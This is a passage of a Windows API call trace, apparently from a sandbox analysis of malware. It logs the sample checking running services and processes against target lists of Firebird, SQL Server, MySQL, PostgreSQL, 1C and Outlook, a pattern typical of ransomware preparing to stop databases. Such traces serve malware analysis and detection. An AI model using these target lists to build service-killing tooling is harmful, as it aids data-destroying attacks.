lpString2="Dhcp") returned 1 [0043.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0043.594] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0043.594] lstrlenW (lpString="Dnscache") returned 8 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0043.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0043.594] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0043.594] lstrlenW (lpString="DPS") returned 3 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0043.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0043.594] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0043.594] lstrlenW (lpString="eventlog") returned 8 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0043.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0043.594] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0043.594] lstrlenW (lpString="EventSystem") returned 11 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0043.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0043.594] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0043.594] lstrlenW (lpString="gpsvc") returned 5 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0043.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0043.595] lstrlenW (lpString="iphlpsvc") returned 8 [0043.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0043.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0043.595] lstrlenW (lpString="LanmanServer") returned 12 [0043.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0043.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0043.595] lstrlenW (lpString="LanmanWorkstation") returned 17 [0043.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0043.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0043.595] lstrlenW (lpString="lmhosts") returned 7 [0043.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0043.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0043.595] lstrlenW (lpString="MMCSS") returned 5 [0043.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0043.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0043.595] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0043.595] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0043.596] lstrlenW (lpString="MpsSvc") returned 6 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0043.596] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0043.596] lstrlenW (lpString="Netman") returned 6 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0043.596] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0043.596] lstrlenW (lpString="netprofm") returned 8 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0043.596] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0043.596] lstrlenW (lpString="NlaSvc") returned 6 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0043.596] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0043.596] lstrlenW (lpString="nsi") returned 3 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0043.596] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0043.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0043.596] lstrlenW (lpString="PcaSvc") returned 6 [0043.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0043.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0043.596] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0043.597] lstrlenW (lpString="PlugPlay") returned 8 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0043.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0043.597] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0043.597] lstrlenW (lpString="Power") returned 5 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0043.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0043.597] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0043.597] lstrlenW (lpString="ProfSvc") returned 7 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0043.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0043.597] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0043.597] lstrlenW (lpString="RpcEptMapper") returned 12 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.597] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0043.597] lstrlenW (lpString="RpcSs") returned 5 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0043.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0043.597] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0043.597] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0043.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0043.597] lstrlenW (lpString="SamSs") returned 5 [0043.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0043.598] lstrlenW (lpString="Schedule") returned 8 [0043.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0043.598] lstrlenW (lpString="SENS") returned 4 [0043.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0043.598] lstrlenW (lpString="ShellHWDetection") returned 16 [0043.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0043.598] lstrlenW (lpString="Spooler") returned 7 [0043.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0043.598] lstrlenW (lpString="swprv") returned 5 [0043.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0043.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0043.598] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0043.598] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0043.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0043.599] lstrlenW (lpString="SysMain") returned 7 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.599] lstrlenW (lpString="Themes") returned 6 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0043.599] lstrlenW (lpString="TrkWks") returned 6 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0043.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0043.599] lstrlenW (lpString="UxSms") returned 5 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0043.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0043.599] lstrlenW (lpString="VSS") returned 3 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0043.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0043.599] lstrlenW (lpString="WdiServiceHost") returned 14 [0043.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.599] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0043.599] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0043.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0043.600] lstrlenW (lpString="WdiSystemHost") returned 13 [0043.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.600] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0043.600] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0043.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0043.600] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0043.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.600] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0043.600] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0043.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0043.600] lstrlenW (lpString="Winmgmt") returned 7 [0043.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0043.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0043.600] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0043.600] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0043.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0043.600] lstrlenW (lpString="WPDBusEnum") returned 10 [0043.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.600] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0043.600] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0043.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0043.600] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0043.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0043.603] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.604] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.605] lstrlenW (lpString="System") returned 6 [0043.605] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0043.605] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0043.605] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.605] lstrlenW (lpString="smss.exe") returned 8 [0043.605] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0043.606] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.606] lstrlenW (lpString="csrss.exe") returned 9 [0043.606] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0043.606] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0043.606] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0043.606] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0043.606] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0043.607] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0043.607] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.607] lstrlenW (lpString="wininit.exe") returned 11 [0043.607] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0043.607] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0043.607] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0043.607] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.608] lstrlenW (lpString="csrss.exe") returned 9 [0043.608] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.609] lstrlenW (lpString="winlogon.exe") returned 12 [0043.609] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.609] lstrlenW (lpString="services.exe") returned 12 [0043.609] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.610] lstrlenW (lpString="lsass.exe") returned 9 [0043.610] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0043.611] lstrlenW (lpString="lsm.exe") returned 7 [0043.611] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.611] lstrlenW (lpString="svchost.exe") returned 11 [0043.612] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.612] lstrlenW (lpString="svchost.exe") returned 11 [0043.612] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.613] lstrlenW (lpString="svchost.exe") returned 11 [0043.613] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.614] lstrlenW (lpString="svchost.exe") returned 11 [0043.614] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.614] lstrlenW (lpString="svchost.exe") returned 11 [0043.614] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.615] lstrlenW (lpString="audiodg.exe") returned 11 [0043.615] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.616] lstrlenW (lpString="svchost.exe") returned 11 [0043.616] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.616] lstrlenW (lpString="svchost.exe") returned 11 [0043.616] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, 